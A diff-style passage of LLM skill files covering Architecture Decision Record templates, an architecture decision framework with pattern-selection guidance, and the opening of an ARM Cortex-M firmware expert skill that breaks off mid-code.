- Modern software architecture patterns and anti-patterns
- Cloud-native technologies and container orchestration
- Distributed systems theory and CAP theorem implications
- Microservices patterns from Martin Fowler and Sam Newman
- Domain-Driven Design from Eric Evans and Vaughn Vernon
- Clean Architecture from Robert C. Martin (Uncle Bob)
- Building Microservices and system design principles
- Site Reliability Engineering and platform engineering practices
- Event-driven architecture and event sourcing patterns
- Modern observability and monitoring best practices

## Response Approach

1. **Analyze architectural context** and identify the system's current state
2. **Assess architectural impact** of proposed changes (High/Medium/Low)
3. **Evaluate pattern compliance** against established architecture principles
4. **Identify architectural violations** and anti-patterns
5. **Recommend improvements** with specific refactoring suggestions
6. **Consider scalability implications** for future growth
7. **Document decisions** with architectural decision records when needed
8. **Provide implementation guidance** with concrete next steps

## Example Interactions

- "Review this microservice design for proper bounded context boundaries"
- "Assess the architectural impact of adding event sourcing to our system"
- "Evaluate this API design for REST and GraphQL best practices"
- "Review our service mesh implementation for security and performance"
- "Analyze this database schema for microservices data isolation"
- "Assess the architectural trade-offs of serverless vs. containerized deployment"
- "Review this event-driven system design for proper decoupling"
- "Evaluate our CI/CD pipeline architecture for scalability and security"
444
packages/llm/skills/architecture-decision-records/SKILL.md
Normal file
@ -0,0 +1,444 @@
---
name: architecture-decision-records
description: "Write and maintain Architecture Decision Records (ADRs) following best practices for technical decision documentation. Use when documenting significant technical decisions, reviewing past architect..."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Architecture Decision Records

Comprehensive patterns for creating, maintaining, and managing Architecture Decision Records (ADRs) that capture the context and rationale behind significant technical decisions.

## Use this skill when

- Making significant architectural decisions
- Documenting technology choices
- Recording design trade-offs
- Onboarding new team members
- Reviewing historical decisions
- Establishing decision-making processes

## Do not use this skill when

- You only need to document small implementation details
- The change is a minor patch or routine maintenance
- There is no architectural decision to capture

## Instructions

1. Capture the decision context, constraints, and drivers.
2. Document considered options with tradeoffs.
3. Record the decision, rationale, and consequences.
4. Link related ADRs and update status over time.

## Core Concepts

### 1. What is an ADR?

An Architecture Decision Record captures:

- **Context**: Why we needed to make a decision
- **Decision**: What we decided
- **Consequences**: What happens as a result

### 2. When to Write an ADR

| Write ADR | Skip ADR |
|-----------|----------|
| New framework adoption | Minor version upgrades |
| Database technology choice | Bug fixes |
| API design patterns | Implementation details |
| Security architecture | Routine maintenance |
| Integration patterns | Configuration changes |

### 3. ADR Lifecycle

```
Proposed → Accepted → Deprecated → Superseded
   ↓
Rejected
```
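The lifecycle above implies a small set of legal status transitions. A hypothetical helper makes the rule explicit; the status names follow the diagram, and the function is illustrative rather than part of any real ADR tooling:

```python
# Status names follow the lifecycle diagram; this helper is illustrative only.
ADR_TRANSITIONS = {
    "Proposed": {"Accepted", "Rejected"},
    "Accepted": {"Deprecated", "Superseded"},
    "Deprecated": set(),   # terminal
    "Superseded": set(),   # terminal
    "Rejected": set(),     # terminal
}

def can_transition(current: str, new: str) -> bool:
    """Return True if moving an ADR from `current` to `new` is legal."""
    return new in ADR_TRANSITIONS.get(current, set())
```

A CI check built on something like this could reject pull requests that edit an accepted ADR instead of superseding it.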

## Templates

### Template 1: Standard ADR (MADR Format)

```markdown
# ADR-0001: Use PostgreSQL as Primary Database

## Status

Accepted

## Context

We need to select a primary database for our new e-commerce platform. The system
will handle:
- ~10,000 concurrent users
- Complex product catalog with hierarchical categories
- Transaction processing for orders and payments
- Full-text search for products
- Geospatial queries for store locator

The team has experience with MySQL, PostgreSQL, and MongoDB. We need ACID
compliance for financial transactions.

## Decision Drivers

* **Must have ACID compliance** for payment processing
* **Must support complex queries** for reporting
* **Should support full-text search** to reduce infrastructure complexity
* **Should have good JSON support** for flexible product attributes
* **Team familiarity** reduces onboarding time

## Considered Options

### Option 1: PostgreSQL
- **Pros**: ACID compliant, excellent JSON support (JSONB), built-in full-text
  search, PostGIS for geospatial, team has experience
- **Cons**: Slightly more complex replication setup than MySQL

### Option 2: MySQL
- **Pros**: Very familiar to team, simple replication, large community
- **Cons**: Weaker JSON support, no built-in full-text search (need
  Elasticsearch), no geospatial without extensions

### Option 3: MongoDB
- **Pros**: Flexible schema, native JSON, horizontal scaling
- **Cons**: No ACID for multi-document transactions (at decision time),
  team has limited experience, requires schema design discipline

## Decision

We will use **PostgreSQL 15** as our primary database.

## Rationale

PostgreSQL provides the best balance of:
1. **ACID compliance** essential for e-commerce transactions
2. **Built-in capabilities** (full-text search, JSONB, PostGIS) reduce
   infrastructure complexity
3. **Team familiarity** with SQL databases reduces learning curve
4. **Mature ecosystem** with excellent tooling and community support

The slight complexity in replication is outweighed by the reduction in
additional services (no separate Elasticsearch needed).

## Consequences

### Positive
- Single database handles transactions, search, and geospatial queries
- Reduced operational complexity (fewer services to manage)
- Strong consistency guarantees for financial data
- Team can leverage existing SQL expertise

### Negative
- Need to learn PostgreSQL-specific features (JSONB, full-text search syntax)
- Vertical scaling limits may require read replicas sooner
- Some team members need PostgreSQL-specific training

### Risks
- Full-text search may not scale as well as dedicated search engines
- Mitigation: Design for potential Elasticsearch addition if needed

## Implementation Notes

- Use JSONB for flexible product attributes
- Implement connection pooling with PgBouncer
- Set up streaming replication for read replicas
- Use pg_trgm extension for fuzzy search

## Related Decisions

- ADR-0002: Caching Strategy (Redis) - complements database choice
- ADR-0005: Search Architecture - may supersede if Elasticsearch needed

## References

- [PostgreSQL JSON Documentation](https://www.postgresql.org/docs/current/datatype-json.html)
- [PostgreSQL Full Text Search](https://www.postgresql.org/docs/current/textsearch.html)
- Internal: Performance benchmarks in `/docs/benchmarks/database-comparison.md`
```

### Template 2: Lightweight ADR

```markdown
# ADR-0012: Adopt TypeScript for Frontend Development

**Status**: Accepted
**Date**: 2024-01-15
**Deciders**: @alice, @bob, @charlie

## Context

Our React codebase has grown to 50+ components with increasing bug reports
related to prop type mismatches and undefined errors. PropTypes provide
runtime-only checking.

## Decision

Adopt TypeScript for all new frontend code. Migrate existing code incrementally.

## Consequences

**Good**: Catch type errors at compile time, better IDE support, self-documenting
code.

**Bad**: Learning curve for team, initial slowdown, build complexity increase.

**Mitigations**: TypeScript training sessions, allow gradual adoption with
`allowJs: true`.
```

### Template 3: Y-Statement Format

```markdown
# ADR-0015: API Gateway Selection

In the context of **building a microservices architecture**,
facing **the need for centralized API management, authentication, and rate limiting**,
we decided for **Kong Gateway**
and against **AWS API Gateway and a custom Nginx solution**,
to achieve **vendor independence, plugin extensibility, and team familiarity with Lua**,
accepting that **we need to manage Kong infrastructure ourselves**.
```

### Template 4: ADR for Deprecation

```markdown
# ADR-0020: Deprecate MongoDB in Favor of PostgreSQL

## Status

Accepted (Supersedes ADR-0003)

## Context

ADR-0003 (2021) chose MongoDB for user profile storage due to schema flexibility
needs. Since then:
- MongoDB's multi-document transactions remain problematic for our use case
- Our schema has stabilized and rarely changes
- We now have PostgreSQL expertise from other services
- Maintaining two databases increases operational burden

## Decision

Deprecate MongoDB and migrate user profiles to PostgreSQL.

## Migration Plan

1. **Phase 1** (Week 1-2): Create PostgreSQL schema, dual-write enabled
2. **Phase 2** (Week 3-4): Backfill historical data, validate consistency
3. **Phase 3** (Week 5): Switch reads to PostgreSQL, monitor
4. **Phase 4** (Week 6): Remove MongoDB writes, decommission

## Consequences

### Positive
- Single database technology reduces operational complexity
- ACID transactions for user data
- Team can focus its PostgreSQL expertise

### Negative
- Migration effort (~4 weeks)
- Risk of data issues during migration
- Loss of some schema flexibility

## Lessons Learned

Documented from the ADR-0003 experience:
- Schema flexibility benefits were overestimated
- Operational cost of multiple databases was underestimated
- Consider long-term maintenance in technology decisions
```

### Template 5: Request for Comments (RFC) Style

```markdown
# RFC-0025: Adopt Event Sourcing for Order Management

## Summary

Propose adopting the event sourcing pattern for the order management domain to
improve auditability, enable temporal queries, and support business analytics.

## Motivation

Current challenges:
1. Audit requirements need complete order history
2. "What was the order state at time X?" queries are impossible
3. Analytics team needs an event stream for real-time dashboards
4. Order state reconstruction for customer support is manual

## Detailed Design

### Event Store

```
OrderCreated { orderId, customerId, items[], timestamp }
OrderItemAdded { orderId, item, timestamp }
OrderItemRemoved { orderId, itemId, timestamp }
PaymentReceived { orderId, amount, paymentId, timestamp }
OrderShipped { orderId, trackingNumber, timestamp }
```

### Projections

- **CurrentOrderState**: Materialized view for queries
- **OrderHistory**: Complete timeline for audit
- **DailyOrderMetrics**: Analytics aggregation

### Technology

- Event Store: EventStoreDB (purpose-built, handles projections)
- Alternative considered: Kafka + custom projection service

## Drawbacks

- Learning curve for team
- Increased complexity vs. CRUD
- Need to design events carefully (immutable once stored)
- Storage growth (events never deleted)

## Alternatives

1. **Audit tables**: Simpler but doesn't enable temporal queries
2. **CDC from existing DB**: Complex, doesn't change data model
3. **Hybrid**: Event source only the order state changes

## Unresolved Questions

- [ ] Event schema versioning strategy
- [ ] Retention policy for events
- [ ] Snapshot frequency for performance

## Implementation Plan

1. Prototype with single order type (2 weeks)
2. Team training on event sourcing (1 week)
3. Full implementation and migration (4 weeks)
4. Monitoring and optimization (ongoing)

## References

- [Event Sourcing by Martin Fowler](https://martinfowler.com/eaaDev/EventSourcing.html)
- [EventStoreDB Documentation](https://www.eventstore.com/docs)
```
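The projection idea in the RFC template can be sketched as a fold over the event stream: each event mutates a derived state, and replaying the stream reconstructs the current order. This is a minimal sketch with assumed event field names, not EventStoreDB's actual API:

```python
def project_order(events):
    """Fold an order's event stream into its current state.

    The event shapes here are assumptions for illustration; a real system
    would use the schema agreed in the RFC.
    """
    state = {"items": {}, "paid": 0, "shipped": False}
    for event in events:
        kind = event["type"]
        if kind == "OrderCreated":
            state["customer"] = event["customerId"]
            for item in event["items"]:
                state["items"][item["id"]] = item
        elif kind == "OrderItemAdded":
            state["items"][event["item"]["id"]] = event["item"]
        elif kind == "OrderItemRemoved":
            state["items"].pop(event["itemId"], None)
        elif kind == "PaymentReceived":
            state["paid"] += event["amount"]
        elif kind == "OrderShipped":
            state["shipped"] = True
    return state
```

Temporal queries ("what was the order state at time X?") fall out for free: replay only the events with a timestamp before X.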

## ADR Management

### Directory Structure

```
docs/
├── adr/
│   ├── README.md                      # Index and guidelines
│   ├── template.md                    # Team's ADR template
│   ├── 0001-use-postgresql.md
│   ├── 0002-caching-strategy.md
│   ├── 0003-mongodb-user-profiles.md  # [DEPRECATED]
│   └── 0020-deprecate-mongodb.md      # Supersedes 0003
```

### ADR Index (README.md)

```markdown
# Architecture Decision Records

This directory contains Architecture Decision Records (ADRs) for [Project Name].

## Index

| ADR | Title | Status | Date |
|-----|-------|--------|------|
| 0001 | Use PostgreSQL as Primary Database | Accepted | 2024-01-10 |
| 0002 | Caching Strategy with Redis | Accepted | 2024-01-12 |
| 0003 | MongoDB for User Profiles | Deprecated | 2023-06-15 |
| 0020 | Deprecate MongoDB | Accepted | 2024-01-15 |

## Creating a New ADR

1. Copy `template.md` to `NNNN-title-with-dashes.md`
2. Fill in the template
3. Submit PR for review
4. Update this index after approval

## ADR Status

- **Proposed**: Under discussion
- **Accepted**: Decision made, implementing
- **Deprecated**: No longer relevant
- **Superseded**: Replaced by another ADR
- **Rejected**: Considered but not adopted
```

### Automation (adr-tools)

```bash
# Install adr-tools
brew install adr-tools

# Initialize ADR directory
adr init docs/adr

# Create new ADR
adr new "Use PostgreSQL as Primary Database"

# Supersede an ADR
adr new -s 3 "Deprecate MongoDB in Favor of PostgreSQL"

# Generate table of contents
adr generate toc > docs/adr/README.md

# Link related ADRs
adr link 2 "Complements" 1 "Is complemented by"
```

## Review Process

```markdown
## ADR Review Checklist

### Before Submission
- [ ] Context clearly explains the problem
- [ ] All viable options considered
- [ ] Pros/cons balanced and honest
- [ ] Consequences (positive and negative) documented
- [ ] Related ADRs linked

### During Review
- [ ] At least 2 senior engineers reviewed
- [ ] Affected teams consulted
- [ ] Security implications considered
- [ ] Cost implications documented
- [ ] Reversibility assessed

### After Acceptance
- [ ] ADR index updated
- [ ] Team notified
- [ ] Implementation tickets created
- [ ] Related documentation updated
```

## Best Practices

### Do's
- **Write ADRs early** - Before implementation starts
- **Keep them short** - 1-2 pages maximum
- **Be honest about trade-offs** - Include real cons
- **Link related decisions** - Build a decision graph
- **Update status** - Deprecate when superseded

### Don'ts
- **Don't change accepted ADRs** - Write new ones to supersede
- **Don't skip context** - Future readers need background
- **Don't hide failures** - Rejected decisions are valuable
- **Don't be vague** - Specific decisions, specific consequences
- **Don't forget implementation** - An ADR without action is waste

## Resources

- [Documenting Architecture Decisions (Michael Nygard)](https://cognitect.com/blog/2011/11/15/documenting-architecture-decisions)
- [MADR Template](https://adr.github.io/madr/)
- [ADR GitHub Organization](https://adr.github.io/)
- [adr-tools](https://github.com/npryce/adr-tools)

60
packages/llm/skills/architecture/SKILL.md
Normal file
@ -0,0 +1,60 @@
---
name: architecture
description: "Architectural decision-making framework. Requirements analysis, trade-off evaluation, ADR documentation. Use when making architecture decisions or analyzing system design."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Architecture Decision Framework

> "Requirements drive architecture. Trade-offs inform decisions. ADRs capture rationale."

## 🎯 Selective Reading Rule

**Read ONLY the files relevant to the request!** Check the content map and find what you need.

| File | Description | When to Read |
|------|-------------|--------------|
| `context-discovery.md` | Questions to ask, project classification | Starting architecture design |
| `trade-off-analysis.md` | ADR templates, trade-off framework | Documenting decisions |
| `pattern-selection.md` | Decision trees, anti-patterns | Choosing patterns |
| `examples.md` | MVP, SaaS, Enterprise examples | Reference implementations |
| `patterns-reference.md` | Quick lookup for patterns | Pattern comparison |

---

## 🔗 Related Skills

| Skill | Use For |
|-------|---------|
| `@[skills/database-design]` | Database schema design |
| `@[skills/api-patterns]` | API design patterns |
| `@[skills/deployment-procedures]` | Deployment architecture |

---

## Core Principle

**"Simplicity is the ultimate sophistication."**

- Start simple
- Add complexity ONLY when proven necessary
- You can always add patterns later
- Removing complexity is MUCH harder than adding it

---

## Validation Checklist

Before finalizing architecture:

- [ ] Requirements clearly understood
- [ ] Constraints identified
- [ ] Each decision has a trade-off analysis
- [ ] Simpler alternatives considered
- [ ] ADRs written for significant decisions
- [ ] Team expertise matches chosen patterns

## When to Use

Use this skill when making architecture decisions or analyzing system design with the framework above.

43
packages/llm/skills/architecture/context-discovery.md
Normal file
@ -0,0 +1,43 @@

# Context Discovery

> Before suggesting any architecture, gather context.

## Question Hierarchy (Ask User FIRST)

1. **Scale**
   - How many users? (10, 1K, 100K, 1M+)
   - Data volume? (MB, GB, TB)
   - Transaction rate? (per second/minute)

2. **Team**
   - Solo developer or team?
   - Team size and expertise?
   - Distributed or co-located?

3. **Timeline**
   - MVP/prototype or long-term product?
   - Time-to-market pressure?

4. **Domain**
   - CRUD-heavy or complex business logic?
   - Real-time requirements?
   - Compliance/regulations?

5. **Constraints**
   - Budget limitations?
   - Legacy systems to integrate?
   - Technology stack preferences?

## Project Classification Matrix

```
                 MVP            SaaS              Enterprise
┌──────────────┬──────────────┬─────────────────┬───────────────┐
│ Scale        │ <1K          │ 1K-100K         │ 100K+         │
│ Team         │ Solo         │ 2-10            │ 10+           │
│ Timeline     │ Fast (weeks) │ Medium (months) │ Long (years)  │
│ Architecture │ Simple       │ Modular         │ Distributed   │
│ Patterns     │ Minimal      │ Selective       │ Comprehensive │
│ Example      │ Next.js API  │ NestJS          │ Microservices │
└──────────────┴──────────────┴─────────────────┴───────────────┘
```
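Read programmatically, the classification matrix is just a threshold check. A hypothetical helper, with thresholds taken from the table above (`classify_project` is invented for illustration, not part of the skill), might look like:

```python
def classify_project(users: int, team_size: int, timeline_months: int) -> str:
    """Map the classification matrix onto a rough project class.

    Thresholds mirror the matrix: <1K users / solo / weeks suggests an MVP;
    100K+ users or 10+ developers suggests Enterprise; the middle ground
    lands in SaaS territory.
    """
    if users >= 100_000 or team_size >= 10:
        return "Enterprise"
    if users < 1_000 and team_size == 1 and timeline_months <= 2:
        return "MVP"
    return "SaaS"
```

In practice the matrix is a conversation aid, not a formula; borderline answers ("8 developers, 90K users") deserve the trade-off analysis rather than a hard cutoff.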

94
packages/llm/skills/architecture/examples.md
Normal file
@ -0,0 +1,94 @@
|
||||
# Architecture Examples
|
||||
|
||||
> Real-world architecture decisions by project type.
|
||||
|
||||
---
|
||||
|
||||
## Example 1: MVP E-commerce (Solo Developer)
|
||||
|
||||
```yaml
|
||||
Requirements:
|
||||
- <1000 users initially
|
||||
- Solo developer
|
||||
- Fast to market (8 weeks)
|
||||
- Budget-conscious
|
||||
|
||||
Architecture Decisions:
|
||||
App Structure: Monolith (simpler for solo)
|
||||
Framework: Next.js (full-stack, fast)
|
||||
Data Layer: Prisma direct (no over-abstraction)
|
||||
Authentication: JWT (simpler than OAuth)
|
||||
Payment: Stripe (hosted solution)
|
||||
Database: PostgreSQL (ACID for orders)
|
||||
|
||||
Trade-offs Accepted:
|
||||
- Monolith → Can't scale independently (team doesn't justify it)
|
||||
- No Repository → Less testable (simple CRUD doesn't need it)
|
||||
- JWT → No social login initially (can add later)
|
||||
|
||||
Future Migration Path:
|
||||
- Users > 10K → Extract payment service
|
||||
- Team > 3 → Add Repository pattern
|
||||
- Social login requested → Add OAuth
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Example 2: SaaS Product (5-10 Developers)
|
||||
|
||||
```yaml
|
||||
Requirements:
|
||||
- 1K-100K users
|
||||
- 5-10 developers
|
||||
- Long-term (12+ months)
|
||||
- Multiple domains (billing, users, core)
|
||||
|
||||
Architecture Decisions:
|
||||
App Structure: Modular Monolith (team size optimal)
|
||||
Framework: NestJS (modular by design)
|
||||
Data Layer: Repository pattern (testing, flexibility)
|
||||
Domain Model: Partial DDD (rich entities)
|
||||
Authentication: OAuth + JWT
|
||||
Caching: Redis
|
||||
Database: PostgreSQL
|
||||
|
||||
Trade-offs Accepted:
|
||||
- Modular Monolith → Some module coupling (microservices not justified)
|
||||
- Partial DDD → No full aggregates (no domain experts)
|
||||
- RabbitMQ later → Initial synchronous (add when proven needed)
|
||||
|
||||
Migration Path:
|
||||
- Team > 10 → Consider microservices
|
||||
- Domains conflict → Extract bounded contexts
|
||||
- Read performance issues → Add CQRS
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Example 3: Enterprise (100K+ Users)
|
||||
|
||||
```yaml
|
||||
Requirements:
|
||||
- 100K+ users
|
||||
- 10+ developers
|
||||
- Multiple business domains
|
||||
- Different scaling needs
|
||||
- 24/7 availability
|
||||
|
||||
Architecture Decisions:
|
||||
App Structure: Microservices (independent scale)
|
||||
API Gateway: Kong/AWS API GW
|
||||
Domain Model: Full DDD
|
||||
Consistency: Event-driven (eventual OK)
|
||||
Message Bus: Kafka
|
||||
Authentication: OAuth + SAML (enterprise SSO)
|
||||
Database: Polyglot (right tool per job)
|
||||
CQRS: Selected services
|
||||
|
||||
Operational Requirements:
|
||||
- Service mesh (Istio/Linkerd)
|
||||
- Distributed tracing (Jaeger/Tempo)
|
||||
- Centralized logging (ELK/Loki)
|
||||
- Circuit breakers (Resilience4j)
|
||||
- Kubernetes/Helm
|
||||
```
|
||||
68
packages/llm/skills/architecture/pattern-selection.md
Normal file
@@ -0,0 +1,68 @@
# Pattern Selection Guidelines

> Decision trees for choosing architectural patterns.

## Main Decision Tree

```
START: What's your MAIN concern?

┌─ Data Access Complexity?
│  ├─ HIGH (complex queries, testing needed)
│  │    → Repository Pattern + Unit of Work
│  │    VALIDATE: Will data source change frequently?
│  │    ├─ YES → Repository worth the indirection
│  │    └─ NO → Consider simpler ORM direct access
│  └─ LOW (simple CRUD, single database)
│       → ORM directly (Prisma, Drizzle)
│       Simpler = Better, Faster
│
├─ Business Rules Complexity?
│  ├─ HIGH (domain logic, rules vary by context)
│  │    → Domain-Driven Design
│  │    VALIDATE: Do you have domain experts on team?
│  │    ├─ YES → Full DDD (Aggregates, Value Objects)
│  │    └─ NO → Partial DDD (rich entities, clear boundaries)
│  └─ LOW (mostly CRUD, simple validation)
│       → Transaction Script pattern
│       Simpler = Better, Faster
│
├─ Independent Scaling Needed?
│  ├─ YES (different components scale differently)
│  │    → Microservices WORTH the complexity
│  │    REQUIREMENTS (ALL must be true):
│  │    - Clear domain boundaries
│  │    - Team > 10 developers
│  │    - Different scaling needs per service
│  │    IF NOT ALL MET → Modular Monolith instead
│  └─ NO (everything scales together)
│       → Modular Monolith
│       Can extract services later when proven needed
│
└─ Real-time Requirements?
   ├─ HIGH (immediate updates, multi-user sync)
   │    → Event-Driven Architecture
   │    → Message Queue (RabbitMQ, Redis, Kafka)
   │    VALIDATE: Can you handle eventual consistency?
   │    ├─ YES → Event-driven valid
   │    └─ NO → Synchronous with polling
   └─ LOW (eventual consistency acceptable)
        → Synchronous (REST/GraphQL)
        Simpler = Better, Faster
```

## The 3 Questions (Before ANY Pattern)

1. **Problem Solved**: What SPECIFIC problem does this pattern solve?
2. **Simpler Alternative**: Is there a simpler solution?
3. **Deferred Complexity**: Can we add this LATER when needed?

## Red Flags (Anti-patterns)

| Pattern | Anti-pattern | Simpler Alternative |
|---------|--------------|---------------------|
| Microservices | Premature splitting | Start monolith, extract later |
| Clean/Hexagonal | Over-abstraction | Concrete first, interfaces later |
| Event Sourcing | Over-engineering | Append-only audit log |
| CQRS | Unnecessary complexity | Single model |
| Repository | YAGNI for simple CRUD | ORM direct access |
50
packages/llm/skills/architecture/patterns-reference.md
Normal file
@@ -0,0 +1,50 @@
# Architecture Patterns Reference

> Quick reference for common patterns with usage guidance.

## Data Access Patterns

| Pattern | When to Use | When NOT to Use | Complexity |
|---------|-------------|-----------------|------------|
| **Active Record** | Simple CRUD, rapid prototyping | Complex queries, multiple sources | Low |
| **Repository** | Testing needed, multiple sources | Simple CRUD, single database | Medium |
| **Unit of Work** | Complex transactions | Simple operations | High |
| **Data Mapper** | Complex domain, performance | Simple CRUD, rapid dev | High |

## Domain Logic Patterns

| Pattern | When to Use | When NOT to Use | Complexity |
|---------|-------------|-----------------|------------|
| **Transaction Script** | Simple CRUD, procedural | Complex business rules | Low |
| **Table Module** | Record-based logic | Rich behavior needed | Low |
| **Domain Model** | Complex business logic | Simple CRUD | Medium |
| **DDD (Full)** | Complex domain, domain experts | Simple domain, no experts | High |

## Distributed System Patterns

| Pattern | When to Use | When NOT to Use | Complexity |
|---------|-------------|-----------------|------------|
| **Modular Monolith** | Small teams, unclear boundaries | Clear contexts, different scales | Medium |
| **Microservices** | Different scales, large teams | Small teams, simple domain | Very High |
| **Event-Driven** | Real-time, loose coupling | Simple workflows, strong consistency | High |
| **CQRS** | Read/write performance diverges | Simple CRUD, same model | High |
| **Saga** | Distributed transactions | Single database, simple ACID | High |

## API Patterns

| Pattern | When to Use | When NOT to Use | Complexity |
|---------|-------------|-----------------|------------|
| **REST** | Standard CRUD, resources | Real-time, complex queries | Low |
| **GraphQL** | Flexible queries, multiple clients | Simple CRUD, caching needs | Medium |
| **gRPC** | Internal services, performance | Public APIs, browser clients | Medium |
| **WebSocket** | Real-time updates | Simple request/response | Medium |

---

## Simplicity Principle

**"Start simple, add complexity only when proven necessary."**

- You can always add patterns later
- Removing complexity is MUCH harder than adding it
- When in doubt, choose the simpler option
77
packages/llm/skills/architecture/trade-off-analysis.md
Normal file
@@ -0,0 +1,77 @@
# Trade-off Analysis & ADR

> Document every architectural decision with trade-offs.

## Decision Framework

For EACH architectural component, document:

```markdown
## Architecture Decision Record

### Context
- **Problem**: [What problem are we solving?]
- **Constraints**: [Team size, scale, timeline, budget]

### Options Considered

| Option | Pros | Cons | Complexity | When Valid |
|--------|------|------|------------|------------|
| Option A | Benefit 1 | Cost 1 | Low | [Conditions] |
| Option B | Benefit 2 | Cost 2 | High | [Conditions] |

### Decision
**Chosen**: [Option B]

### Rationale
1. [Reason 1 - tied to constraints]
2. [Reason 2 - tied to requirements]

### Trade-offs Accepted
- [What we're giving up]
- [Why this is acceptable]

### Consequences
- **Positive**: [Benefits we gain]
- **Negative**: [Costs/risks we accept]
- **Mitigation**: [How we'll address negatives]

### Revisit Trigger
- [When to reconsider this decision]
```

## ADR Template

```markdown
# ADR-[XXX]: [Decision Title]

## Status
Proposed | Accepted | Deprecated | Superseded by [ADR-YYY]

## Context
[What problem? What constraints?]

## Decision
[What we chose - be specific]

## Rationale
[Why - tie to requirements and constraints]

## Trade-offs
[What we're giving up - be honest]

## Consequences
- **Positive**: [Benefits]
- **Negative**: [Costs]
- **Mitigation**: [How to address]
```

## ADR Storage

```
docs/
└── architecture/
    ├── adr-001-use-nextjs.md
    ├── adr-002-postgresql-over-mongodb.md
    └── adr-003-adopt-repository-pattern.md
```
302
packages/llm/skills/arm-cortex-expert/SKILL.md
Normal file
@@ -0,0 +1,302 @@
---
name: arm-cortex-expert
description: Senior embedded software engineer specializing in firmware and driver development for ARM Cortex-M microcontrollers (Teensy, STM32, nRF52, SAMD).
risk: unknown
source: community
date_added: '2026-02-27'
---

# @arm-cortex-expert

## Use this skill when

- Working on @arm-cortex-expert tasks or workflows
- Needing guidance, best practices, or checklists for @arm-cortex-expert

## Do not use this skill when

- The task is unrelated to @arm-cortex-expert
- You need a different domain or tool outside this scope

## Instructions

- Clarify goals, constraints, and required inputs.
- Apply relevant best practices and validate outcomes.
- Provide actionable steps and verification.
- If detailed examples are required, open `resources/implementation-playbook.md`.

## 🎯 Role & Objectives

- Deliver **complete, compilable firmware and driver modules** for ARM Cortex-M platforms.
- Implement **peripheral drivers** (I²C/SPI/UART/ADC/DAC/PWM/USB) with clean abstractions using HAL, bare-metal registers, or platform-specific libraries.
- Provide **software architecture guidance**: layering, HAL patterns, interrupt safety, memory management.
- Show **robust concurrency patterns**: ISRs, ring buffers, event queues, cooperative scheduling, FreeRTOS/Zephyr integration.
- Optimize for **performance and determinism**: DMA transfers, cache effects, timing constraints, memory barriers.
- Focus on **software maintainability**: code comments, unit-testable modules, modular driver design.
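The ISR-to-main-loop data paths listed above typically rest on a single-producer single-consumer ring buffer. A minimal sketch, with illustrative names and sizing rather than any specific SDK's API:

```c
#include <stdint.h>
#include <stdbool.h>

/* SPSC byte ring buffer: the ISR calls rb_put(), the main loop calls
 * rb_get(). With a single writer per index and power-of-two sizing, no
 * locking is needed on Cortex-M (aligned word stores are atomic). */
#define RB_SIZE 64u /* must be a power of two */

typedef struct {
    uint8_t buf[RB_SIZE];
    volatile uint32_t head; /* written only by the producer (ISR) */
    volatile uint32_t tail; /* written only by the consumer (main) */
} ringbuf_t;

static bool rb_put(ringbuf_t *rb, uint8_t byte) {
    uint32_t next = (rb->head + 1u) & (RB_SIZE - 1u);
    if (next == rb->tail) return false; /* full: drop, never block in an ISR */
    rb->buf[rb->head] = byte;
    rb->head = next; /* publish last */
    return true;
}

static bool rb_get(ringbuf_t *rb, uint8_t *out) {
    if (rb->tail == rb->head) return false; /* empty */
    *out = rb->buf[rb->tail];
    rb->tail = (rb->tail + 1u) & (RB_SIZE - 1u);
    return true;
}
```

Updating `head` only after the payload byte is stored is what makes the hand-off safe without a critical section.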
---

## 🧠 Knowledge Base

**Target Platforms**

- **Teensy 4.x** (i.MX RT1062, Cortex-M7 600 MHz, tightly coupled memory, caches, DMA)
- **STM32** (F4/F7/H7 series, Cortex-M4/M7, HAL/LL drivers, STM32CubeMX)
- **nRF52** (Nordic Semiconductor, Cortex-M4, BLE, nRF SDK/Zephyr)
- **SAMD** (Microchip/Atmel, Cortex-M0+/M4, Arduino/bare-metal)

**Core Competencies**

- Writing register-level drivers for I²C, SPI, UART, CAN, SDIO
- Interrupt-driven data pipelines and non-blocking APIs
- DMA usage for high-throughput (ADC, SPI, audio, UART)
- Implementing protocol stacks (BLE, USB CDC/MSC/HID, MIDI)
- Peripheral abstraction layers and modular codebases
- Platform-specific integration (Teensyduino, STM32 HAL, nRF SDK, Arduino SAMD)

**Advanced Topics**

- Cooperative vs. preemptive scheduling (FreeRTOS, Zephyr, bare-metal schedulers)
- Memory safety: avoiding race conditions, cache line alignment, stack/heap balance
- ARM Cortex-M7 memory barriers for MMIO and DMA/cache coherency
- Efficient C++17/Rust patterns for embedded (templates, constexpr, zero-cost abstractions)
- Cross-MCU messaging over SPI/I²C/USB/BLE

---

## ⚙️ Operating Principles

- **Safety Over Performance:** correctness first; optimize after profiling
- **Full Solutions:** complete drivers with init, ISR, example usage — not snippets
- **Explain Internals:** annotate register usage, buffer structures, ISR flows
- **Safe Defaults:** guard against buffer overruns, blocking calls, priority inversions, missing barriers
- **Document Tradeoffs:** blocking vs async, RAM vs flash, throughput vs CPU load

---

## 🛡️ Safety-Critical Patterns for ARM Cortex-M7 (Teensy 4.x, STM32 F7/H7)

### Memory Barriers for MMIO (ARM Cortex-M7 Weakly-Ordered Memory)

**CRITICAL:** ARM Cortex-M7 has weakly-ordered memory. The CPU and hardware can reorder register reads/writes relative to other operations.

**Symptoms of Missing Barriers:**

- "Works with debug prints, fails without them" (print adds implicit delay)
- Register writes don't take effect before the next instruction executes
- Reading stale register values despite hardware updates
- Intermittent failures that disappear with optimization level changes

#### Implementation Pattern

**C/C++:** Wrap register access with `__DMB()` (data memory barrier) before/after reads, `__DSB()` (data synchronization barrier) after writes. Create helper functions: `mmio_read()`, `mmio_write()`, `mmio_modify()`.

**Rust:** Use `cortex_m::asm::dmb()` and `cortex_m::asm::dsb()` around volatile reads/writes. Create macros like `safe_read_reg!()`, `safe_write_reg!()`, `safe_modify_reg!()` that wrap HAL register access.

**Why This Matters:** The M7 reorders memory operations for performance. Without barriers, a register write may not complete before the next instruction, or a read may return a stale cached value.
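The C/C++ side of the pattern can be sketched as follows. On target, `__DMB()`/`__DSB()` come from CMSIS (`core_cm7.h`); the fallback macro below is only there so the sketch also compiles off-target and is an assumption of this example, not part of the pattern:

```c
#include <stdint.h>

/* Host fallback so the sketch compiles without CMSIS; on Cortex-M these
 * intrinsics emit the DMB/DSB instructions. */
#ifndef __DMB
#define __DMB() __sync_synchronize()
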